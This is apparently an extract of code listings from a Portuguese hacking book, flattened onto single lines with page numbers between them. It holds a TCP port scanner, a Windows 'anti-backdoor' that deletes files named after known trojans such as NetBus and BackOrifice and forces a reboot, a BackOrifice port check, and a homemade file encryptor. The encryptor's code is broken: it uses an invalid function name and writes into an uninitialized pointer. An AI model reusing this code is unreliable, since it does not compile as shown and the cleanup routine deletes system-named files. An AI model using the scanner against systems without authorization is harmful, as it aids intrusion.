Private Sub Form_Activate() stayontop Me End Sub Private Sub Form_Load() StopIt = False sock.Protocol = sckTCPProtocol Me.Visible = True stayontop Me End Sub Private Sub Form_Resize() stayontop Me End Sub Private Sub Form_Unload(Cancel As Integer) sock.Close Do Until sock.State = 0 DoEvents Loop Cancel = False End Sub Private Sub Label2_Click() MsgBox "" & Label2.Caption & "", vbMsgBoxSetForeground + vbOKOnly, "Port Finder" End Sub


Página 328 unit mpsunit1; interface uses Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs, StdCtrls, ExtCtrls, ScktComp; type TForm1 = class(TForm) Bevel1: TBevel; Bevel2: TBevel; Label1: TLabel; Edit1: TEdit; Label2: TLabel; Edit2: TEdit; Edit3: TEdit; Label3: TLabel; Bevel3: TBevel; Button1: TButton; Button2: TButton; Button3: TButton; Button4: TButton; Bevel4: TBevel; Edit4: TEdit; ListBox1: TListBox; ps: TClientSocket; procedure Button1Click(Sender: TObject); procedure psConnect(Sender: TObject; Socket: TCustomWinSocket); procedure psError(Sender: TObject; Socket: TCustomWinSocket; ErrorEvent: TErrorEvent; var ErrorCode: Integer); procedure Button2Click(Sender: TObject); procedure Button3Click(Sender: TObject); procedure FormClose(Sender: TObject; var Action: TCloseAction); procedure Button4Click(Sender: TObject); private { Private declarations } public { Public declarations } end; var Form1: TForm1; portno:integer; implementation {$R *.DFM} procedure TForm1.Button1Click(Sender: TObject); begin button1.enabled:=false; edit1.enabled:=false; edit2.enabled:=false; edit3.enabled:=false; edit4.enabled:=false; button2.enabled:=true; portno:=strtoint(edit2.text); ps.address:=edit1.text; ps.port:=portno; ps.active:=true; end; procedure TForm1.psConnect(Sender: TObject; Socket: TCustomWinSocket); label son;


begin listbox1.items.add('Connect on Port: '+inttostr(portno)); ps.active:=false; portno:=portno+1; if portno > strtoint(edit3.text) then goto son else ps.address:=edit1.text; ps.port:=portno; ps.active:=true; son: end; procedure TForm1.psError(Sender: TObject; Socket: TCustomWinSocket; ErrorEvent: TErrorEvent; var ErrorCode: Integer); label son; begin errorcode:=0; edit4.text:='Scanned Port No: '+inttostr(portno); ps.active:=false; portno:=portno+1; if portno > strtoint(edit3.text) then goto son else ps.address:=edit1.text; ps.port:=portno; ps.active:=true; son: end; procedure TForm1.Button2Click(Sender: TObject); begin portno:=strtoint(edit3.text); button1.enabled:=true; edit1.enabled:=true; edit2.enabled:=true; edit3.enabled:=true; edit4.enabled:=true; button2.enabled:=false; end; procedure TForm1.Button3Click(Sender: TObject); begin edit4.text:=''; listbox1.items.clear; end; procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction); begin ps.active:=false; end; procedure TForm1.Button4Click(Sender: TObject); begin ShowMessage('Meliksah Port Scanner v0.1 Beta'+#13+ '(C)opyright 1999 Meliksah Ozoral'+#13+ ' All Rights Reserved '+#13+#13+ ' http://www.mimsa.com/meliksah '+#13+ ' [email protected] '); end; end.


Página 380 Attribute VB_Name = "ANTIBACK" Option Explicit ' Rotinas Diversas Declare Function GetSystemDirectory Lib "kernel32.dll" Alias "GetSystemDirectoryA" _ (ByVal lpBuffer As String, ByVal nSize As Long) As Long Declare Function GetWindowsDirectory Lib "kernel32.dll" Alias "GetWindowsDirectoryA" _ (ByVal lpBuffer As String, ByVal nSize As Long) As Long Declare Function ExitWindowsEx Lib "user32" _ (ByVal uFlags As Long, ByVal dwReserved As Long) As Long ' Trabalhar com o Registry do Windows Public Const REG_SZ As Long = 1 Public Const REG_BINARY As Long = 3 Public Const REG_DWORD As Long = 4 Public Const HKEY_CLASSES_ROOT = &H80000000 Public Const HKEY_CURRENT_USER = &H80000001 Public Const HKEY_LOCAL_MACHINE = &H80000002 Public Const HKEY_USERS = &H80000003 Public Const ERROR_NONE = 0 Public Const ERROR_BADDB = 1 Public Const ERROR_BADKEY = 2 Public Const ERROR_CANTOPEN = 3 Public Const ERROR_CANTREAD = 4 Public Const ERROR_CANTWRITE = 5 Public Const ERROR_OUTOFMEMORY = 6 Public Const ERROR_INVALID_PARAMETER = 7 Public Const ERROR_ACCESS_DENIED = 8 Public Const ERROR_INVALID_PARAMETERS = 87 Public Const ERROR_NO_MORE_ITEMS = 259 Public Const KEY_ALL_ACCESS = &H3F Public Const REG_OPTION_NON_VOLATILE = 0 Public Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long Public Declare Function RegCreateKeyEx Lib "advapi32.dll" Alias "RegCreateKeyExA" _ (ByVal hKey As Long, ByVal lpSubKey As String, _ ByVal Reserved As Long, ByVal lpClass As String, _ ByVal dwOptions As Long, ByVal samDesired As Long, _ ByVal lpSecurityAttributes As Long, phkResult As Long, _ lpdwDisposition As Long) As Long Public Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" _ (ByVal hKey As Long, ByVal lpSubKey As String, _ ByVal ulOptions As Long, ByVal samDesired As Long, _ phkResult As Long) As Long Public Declare Function RegQueryValueExString Lib "advapi32.dll" Alias _ "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, _ ByVal lpReserved As Long, lpType As Long, _


ByVal lpData As String, lpcbData As Long) As Long Public Declare Function RegQueryValueExLong Lib "advapi32.dll" Alias _ "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, _ ByVal lpReserved As Long, lpType As Long, _ lpData As Long, lpcbData As Long) As Long Public Declare Function RegQueryValueExNULL Lib "advapi32.dll" Alias _ "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, _ ByVal lpReserved As Long, lpType As Long, _ ByVal lpData As Long, lpcbData As Long) As Long Public Declare Function RegSetValueExString Lib "advapi32.dll" Alias "RegSetValueExA" _ (ByVal hKey As Long, ByVal lpValueName As String, _ ByVal Reserved As Long, ByVal dwType As Long, _ ByVal lpValue As String, ByVal cbData As Long) As Long Public Declare Function RegSetValueExLong Lib "advapi32.dll" Alias "RegSetValueExA" _ (ByVal hKey As Long, ByVal lpValueName As String, _ ByVal Reserved As Long, ByVal dwType As Long, lpValue As Long, _ ByVal cbData As Long) As Long Public Function SetValueEx(ByVal hKey As Long, sValueName As String, lType As Long, _ vValue As Variant) As Long ' Declaracao de Variaveis Dim lValue As Long Dim sValue As String ' Verificacao Select Case lType Case REG_SZ sValue = vValue & Chr$(0) SetValueEx = RegSetValueExString(hKey, sValueName, 0&, lType, sValue, Len(sValue)) Case REG_DWORD lValue = vValue SetValueEx = RegSetValueExLong(hKey, sValueName, 0&, lType, lValue, 4) End Select End Function Function QueryValueEx(ByVal lhKey As Long, ByVal szValueName As String, _ vValue As Variant) As Long On Error GoTo QueryValueExError ' Declaracao de Variaveis Dim cch As Long Dim lrc As Long Dim lType As Long Dim lValue As Long Dim sValue As String Dim nLoop As Long Dim sBinaryString As String ' Determina o Tamanho e o Tipo de Dado a Ler lrc = RegQueryValueExNULL(lhKey, szValueName, 0&, lType, 0&, cch)


If lrc <> ERROR_NONE Then Error 5 Select Case lType ' Strings ... Case REG_SZ: sValue = String(cch, 0) lrc = RegQueryValueExString(lhKey, szValueName, 0&, lType, sValue, cch) If lrc = ERROR_NONE Then vValue = Left$(sValue, cch - 1) Else vValue = Empty End If ' DWORDS ... Case REG_DWORD: lrc = RegQueryValueExLong(lhKey, szValueName, 0&, lType, lValue, cch) If lrc = ERROR_NONE Then vValue = lValue Case Else ' Todos Outros Tipos de Dados Não Suportados lrc = -1 End Select QueryValueExExit: QueryValueEx = lrc Exit Function QueryValueExError: Resume QueryValueExExit End Function Public Sub CreateNewKey(sNewKeyName As String, lPredefinedKey As Long) Dim hNewKey As Long Dim lRetVal As Long lRetVal = RegCreateKeyEx(lPredefinedKey, sNewKeyName, 0&, vbNullString, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, 0&, hNewKey, lRetVal) RegCloseKey (hNewKey) End Sub Public Sub SetKeyValue(sKeyName As String, sValueName As String, vValueSetting As Variant, _ lValueType As Long) Dim lRetVal As Long Dim hKey As Long lRetVal = RegOpenKeyEx(HKEY_LOCAL_MACHINE, sKeyName, 0, KEY_ALL_ACCESS, hKey) lRetVal = SetValueEx(hKey, sValueName, lValueType, vValueSetting) RegCloseKey (hKey) End Sub Public Sub SetKeyValue2(sKeyName As String, sValueName As String, _ vValueSetting As Variant, lValueType As Long) Dim lRetVal As Long Dim hKey As Long lRetVal = RegOpenKeyEx(HKEY_USERS, sKeyName, 0, KEY_ALL_ACCESS, hKey) lRetVal = SetValueEx(hKey, sValueName, lValueType, vValueSetting) RegCloseKey (hKey)


End Sub Public Function QueryValue(sKeyName As String, sValueName As String) As String Dim lRetVal As Long Dim hKey As Long Dim vValue As Variant lRetVal = RegOpenKeyEx(HKEY_LOCAL_MACHINE, sKeyName, 0, KEY_ALL_ACCESS, hKey) lRetVal = QueryValueEx(hKey, sValueName, vValue) QueryValue = vValue RegCloseKey (hKey) End Function Public Function QueryValue2(sKeyName As String, sValueName As String) As String Dim lRetVal As Long Dim hKey As Long Dim vValue As Variant lRetVal = RegOpenKeyEx(HKEY_USERS, sKeyName, 0, KEY_ALL_ACCESS, hKey) lRetVal = QueryValueEx(hKey, sValueName, vValue) QueryValue2 = vValue RegCloseKey (hKey) End Function ' ' Funcao Principal ' Public Sub Main() On Error Resume Next ' Declaracao de Variaveis Dim cDiretorioSystem As String Dim cDiretorioWindows As String Dim cPosicaoRegistry As String Dim cBackdoor As String Dim cTitulo As String Dim cBuffer As String * 255 Dim lDarBoot As Boolean Dim nResposta As Long Dim xRetorno As Variant ' Titulo cTitulo = "Senna Spy Anti-Backdoor 1.0 - By 2801Megazine - Edicao 2, 1998" ' Mensagem MsgBox cTitulo + " - Ativada" ' Obtem o Diretorio System do Windows nResposta = GetSystemDirectory(cBuffer, Len(cBuffer)) cDiretorioSystem = Left(cBuffer, nResposta) + "\" ' Obtem o Diretorio do Windows nResposta = GetWindowsDirectory(cBuffer, Len(cBuffer)) cDiretorioWindows = Left(cBuffer, nResposta) + "\" ' ' Verifica se Existem os Ficheiros das Backdoor´s a Serem Eliminadas '


' Aqui, a Exclusão da Back Orifice cBackdoor = cDiretorioSystem + " .EXE" SetAttr cBackdoor, vbNormal Kill cBackdoor ' Aqui, a Exclusão da NetBus cBackdoor = cDiretorioWindows + "PATCH.EXE" SetAttr cBackdoor, vbNormal Kill cBackdoor ' Aqui, a Exclusão do Graffiti Explorer cBackdoor = cDiretorioSystem + "EXPLORER.EXE" SetAttr cBackdoor, vbNormal Kill cBackdoor ' Aqui, a Exclusão do Sockets de Troie cBackdoor = cDiretorioSystem + "SOCKETS23.EXE" SetAttr cBackdoor, vbNormal Kill cBackdoor cBackdoor = cDiretorioWindows + "SOCKETS23.EXE" SetAttr cBackdoor, vbNormal Kill cBackdoor ' Aqui, a Exclusão da The Mask Robot cBackdoor = cDiretorioSystem + "MGADESKDLL.EXE" SetAttr cBackdoor, vbNormal Kill cBackdoor cBackdoor = cDiretorioSystem + "CSMCTRL32.EXE" SetAttr cBackdoor, vbNormal Kill cBackdoor cBackdoor = cDiretorioWindows + "RSRCLOAD.EXE" SetAttr cBackdoor, vbNormal Kill cBackdoor ' Aqui, a Exclusão da Master Paradise cBackdoor = cDiretorioWindows + "SYSEDIT.EXE" SetAttr cBackdoor, vbNormal Kill cBackdoor cBackdoor = cDiretorioWindows + "KEYHOOK.DLL" SetAttr cBackdoor, vbNormal Kill cBackdoor ' Aqui, a Exclusão da WINRUN cBackdoor = cDiretorioWindows + "WINRUN.EXE" SetAttr cBackdoor, vbNormal Kill cBackdoor cBackdoor = cDiretorioSystem + "WINRUN.EXE" SetAttr cBackdoor, vbNormal Kill cBackdoor ' Aqui, a Exclusão da WIN32X cBackdoor = cDiretorioWindows + "WIN32X.EXE" SetAttr cBackdoor, vbNormal Kill cBackdoor cBackdoor = cDiretorioSystem + "WIN32X.EXE" SetAttr cBackdoor, vbNormal Kill cBackdoor


' Flag Para Controlar Se Deve Dar Boot no Micro ou Não lDarBoot = False ' ' Controla o Registry Infinitamente, a Fim de Dectectar Inclusoes ' While True DoEvents ' Verifica se o Back Orifice Esta Sendo Instalado Neste Momento cPosicaoRegistry = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices" If UCase(QueryValue(cPosicaoRegistry, "")) = " .EXE" Then SetKeyValue cPosicaoRegistry, "", "", REG_SZ MsgBox "ATENCAO: Back Orifice Encontrado e Removido !", vbOKOnly, cTitulo lDarBoot = True End If ' Verifica se o NetBus Esta Sendo Instalado Neste Momento cPosicaoRegistry = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" If UCase(QueryValue(cPosicaoRegistry, "PATCH")) = "PATCH.EXE" Then SetKeyValue cPosicaoRegistry, "PATCH", "", REG_SZ MsgBox "ATENCAO: NetBus Encontrado e Removido !", vbOKOnly, cTitulo lDarBoot = True End If ' Verifica se o Graffiti Explorer Esta Sendo Instalado Neste Momento cPosicaoRegistry = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" If UCase(QueryValue(cPosicaoRegistry, "EXPLORER")) = "EXPLORER.EXE" Then SetKeyValue cPosicaoRegistry, "EXPLORER", "", REG_SZ MsgBox "ATENCAO: Graffiti Explorer Encontrado e Removido !", vbOKOnly, cTitulo lDarBoot = True End If ' Verifica se o The Mask Robot-1 Esta Sendo Instalado Neste Momento cPosicaoRegistry = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" If UCase(QueryValue(cPosicaoRegistry, "Load RSRCLOAD")) <> "" Then SetKeyValue cPosicaoRegistry, "Load RSRCLOAD", "", REG_SZ MsgBox "ATENCAO: The Mask Robot-1 Encontrado e Removido !", vbOKOnly, cTitulo lDarBoot = True End If ' Verifica se o The Mask Robot-2 Esta Sendo Instalado Neste Momento cPosicaoRegistry = ".Default\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" If UCase(QueryValue2(cPosicaoRegistry, "Load MGADESKDLL")) <> "" Then SetKeyValue2 cPosicaoRegistry, "Load MGADESKDLL", "", REG_SZ MsgBox "ATENCAO: The Mask Robot-2 Encontrado e Removido !", vbOKOnly, cTitulo lDarBoot = True End If ' Verifica se o Master Paradise Esta Sendo Instalado Neste Momento cPosicaoRegistry = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"


If UCase(QueryValue(cPosicaoRegistry, "SYSEDIT")) = "SYSEDIT.EXE" Then SetKeyValue cPosicaoRegistry, "SYSEDIT", "", REG_SZ MsgBox "ATENCAO: Master Paradise Encontrado e Removido !", vbOKOnly, cTitulo lDarBoot = True End If ' Verifica se o WIN32X Esta Sendo Instalado Neste Momento cPosicaoRegistry = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" If UCase(QueryValue(cPosicaoRegistry, "WIN32X")) <> "" Then SetKeyValue cPosicaoRegistry, "WIN32X", "", REG_SZ MsgBox "ATENCAO: WIN32X Encontrado e Removido !", vbOKOnly, cTitulo lDarBoot = True End If ' Verifica se o WINRUN Esta Sendo Instalado Neste Momento cPosicaoRegistry = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" If UCase(QueryValue(cPosicaoRegistry, "WINRUN")) <> "" Then SetKeyValue cPosicaoRegistry, "WINRUN", "", REG_SZ MsgBox "ATENCAO: WINRUN Encontrado e Removido !", vbOKOnly, cTitulo lDarBoot = True End If ' Necessario dar Boot ? If lDarBoot Then MsgBox "Sera Necessario Resetar o Sistema !", vbOKOnly, cTitulo ' Reseta xRetorno = ExitWindowsEx(67, 0) End If Wend End Sub


Página 392 /***** * * portcheck.c - Check if Port is Busy * * - Windows 95, 98, NT and 2000 Compatible * - Borland C++ and LCCWin32 Compilers Tested ! * *****/ #include <windows.h> #include <winsock.h> #include <stdio.h> /*/////////////////////////////////////////////////////// // // // CheckPortUDP() - Check if UDP Port is Busy or Not // // // ///////////////////////////////////////////////////////*/ int CheckPortUDP( short int nPort ) { struct sockaddr_in nSockServer; WSADATA wsaData; int lBusy = 0; int nSocket; /* Initialization */ if( WSAStartup( 0x0101, &wsaData ) == 0 ) { /* Create Socket */ nSockServer.sin_family = AF_INET; nSockServer.sin_port = htons( nPort ); nSockServer.sin_addr.s_addr = inet_addr( "127.0.0.1" ); /* Check UDP Protocol */ nSocket = socket( AF_INET, SOCK_DGRAM, 0 ); lBusy = ( bind( nSocket, (SOCKADDR FAR *) &nSockServer, sizeof( SOCKADDR_IN ) ) == SOCKET_ERROR ); /* Close Socket if Busy */ if( lBusy ) closesocket( nSocket ); /* Close Winsock */ WSACleanup(); } /* Return */ return( lBusy ); } /*/////////////////////////////////////////////////////// // // // CheckPortTCP() - Check if TCP Port is Busy or Not // // // ///////////////////////////////////////////////////////*/ int CheckPortTCP( short int nPort )


{ struct sockaddr_in nSockServer; WSADATA wsaData; int lBusy = 0; int nSocket; /* Initialization */ if( WSAStartup( 0x0101, &wsaData ) == 0 ) { /* Create Socket */ nSockServer.sin_family = AF_INET; nSockServer.sin_port = htons( nPort ); nSockServer.sin_addr.s_addr = inet_addr( "127.0.0.1" ); /* Check TCP Protocol */ nSocket = socket( AF_INET, SOCK_STREAM, 0 ); lBusy = ( connect( nSocket, (struct sockaddr *) &nSockServer, sizeof( nSockServer ) ) == 0 ); /* Close Socket if Busy */ if( lBusy ) closesocket( nSocket ); /* Close Winsock */ WSACleanup(); } /* Return */ return( lBusy ); } /*///////////////////////////// // // // Main Function - Example // // // /////////////////////////////*/ int main() { /* Check for TCP Port */ if( CheckPortTCP( 21 ) ) puts( "FTP Port is Busy !\n" ); else puts( "FTP Port isn't Busy !\n" ); /* Check for UDP Port */ if( CheckPortUDP( 31337 ) ) puts( "BackOrifice Found in your System !" ); else puts( "BackOrifice not found in your System !" ); return 0; }


Página 418 #include <string.h> #include <stdlib.h> #include <io.h> #include <stdio.h> FILE *arq1,*arq2; void mensagem_final() { printf("\n\t\tPrograma desenvolvido por\n"); printf("\t\t APOCALYPSE THE CLAN by\n"); printf("\t\t\tMr DeaTh.\n\n"); printf("\t\t\t\t\t\t\tLooK aROunD, See YoUR EneMY"); fclose(arq1);fclose(arq2); return; } int teste_de_existencia(char n1[],char n2[]) { int vi=1; if ((arq1=fopen(n1,"rb"))==NULL){ printf("O ficheiro %s não foi encontrado.\n",n1);vi=0;} if ((arq2=fopen(n2,"rb"))!=NULL){ printf("O ficheiro %s já existe.\n",n2);vi=0;} if (vi==1){ fclose(arq2); arq2=fopen(n2,"wb");} return vi;} int converte(int y) { int x=y; if (y==65) x=98;if (y==98) x=65; if (y==66) x=105;if (y==105) x=66; if (y==67) x=68;if (y==68) x=67; if (y==69) x=130;if (y==130) x=69; if (y==70) x=40;if (y==40) x=70; if (y==71) x=135;if (y==135) x=71; if (y==72) x=37;if (y==37) x=72; if (y==73) x=164;if (y==164) x=73; if (y==74) x=50;if (y==50) x=74; if (y==75) x=160;if (y==160) x=75; if (y==76) x=99;if (y==99) x=76; if (y==77) x=110;if (y==110) x=77; if (y==78) x=61;if (y==61) x=78; if (y==79) x=144;if (y==144) x=79; if (y==80) x=33;if (y==33) x=80; if (y==81) x=100;if (y==100) x=81; if (y==82) x=63;if (y==63) x=82; if (y==83) x=101;if (y==101) x=83; if (y==84) x=59;if (y==59) x=84; if (y==85) x=149;if (y==149) x=85; if (y==86) x=45;if (y==45) x=86; if (y==87) x=115;if (y==115) x=87; if (y==88) x=47;if (y==47) x=88; if (y==89) x=120;if (y==120) x=89; if (y==90) x=62;if (y==62) x=90; if (y==92) x=102;if (y==102) x=92; if (y==97) x=42;if (y==42) x=97; if (y==103) x=56;if (y==56) x=103; if (y==104) x=48;if (y==48) x=104; if (y==106) x=60;if (y==60) x=106; if (y==107) x=58;if (y==58) x=107; if (y==108) x=46;if (y==46) x=108; if (y==109) x=119;if (y==119) x=109; if (y==111) x=147;if (y==147) x=111; if (y==112) x=32;if (y==32) x=112; if (y==113) x=121;if (y==121) x=113; if (y==114) x=131;if (y==131) x=114; if (y==116) x=118;if (y==118) x=116;


if (y==117) x=122;if (y==122) x=117; return x;} int caixa_preta(int t,char n1[],unsigned char n2) { int x; x=(*n1=='e')?t^n2:~(t^(~n2)); return x; } int super(int t,int r1,int r2,int r3,int r4) { int x=converte(t); x=converte(255-x+r1-r2+r3-r4); return x;} char *palavra-chave(char n[]) { char *snh; printf("Escreva a palavra-chave:\n"); scanf("%s",snh); if (*n=='e') printf("\n\t\tCuidado para não esquecer esta palavra-chave!\n\n"); return snh;} void main(int n,char *o[]) { int t,r1,r2,r3,r4,e,i=strlen(o[1]); if (o[1][0]<97) o[1][0]=o[1][0]+32; if (n!=4 || (*o[1]!='e' && *o[1]!='d') || i!=1) { printf("KRIPT 2.00 Copyright (c) 1997-98 Mr Death\n"); printf("KRIPT Encriptador-Desencriptador de ficheiros texto.\n\n"); printf("Sintaxe: kript <comando> <ficheiro1> <ficheiro2>\n"); printf("<comando>: d -> Desencripta\n"); printf(" e -> Encripta\n"); printf("<ficheiro1>: ficheiro a ser lido\n"); printf("<ficheiro2>: ficheiro a ser criado\n"); } else { randomize(); e=teste_de_existencia(o[2],o[3]); unsigned long c=0,s=filelength(fileno(arq1));char *snh; for (i=0;i<80;i++) snh[i]=0;i=0; if (*o[1]=='e' && e==1) { snh=palavra-chave(o[1]); r1=random(10);r2=random(10);r3=random(20);r4=random(20); fputc(r1+65,arq2);fputc(r2+65,arq2); fputc(r3+65,arq2);fputc(r4+65,arq2); while (c<s) { t=fgetc(arq1);c++; t=caixa_preta(t,o[1],snh[i]); t=super(t,r1,r2,r3,r4); i=(snh[i+1]==0)?0:i+1; fputc(t,arq2);} printf("Encriptado!");} if (*o[1]=='d' && e==1) { snh=palavra-chave(o[1]); r1=fgetc(arq1)-65;r2=fgetc(arq1)-65; r3=fgetc(arq1)-65;r4=fgetc(arq1)-65;c=4; if (r1<0 || r1>9 || r2<0 || r2>9 || r3<0 || r3>19 || r4<0 || r4>19) printf("O ficheiro %s não foi encriptado com KRIPT.\n",o[2]); else { while (c<s) { t=fgetc(arq1);c++; t=super(t,r1,r2,r3,r4); t=caixa_preta(t,o[1],snh[i]); i=(snh[i+1]==0)?0:i+1; fputc(t,arq2);} printf("Desencriptado!");}} mensagem_final();} return; }

Documents

Tecnicas Para Hackers - Wilson Oliveira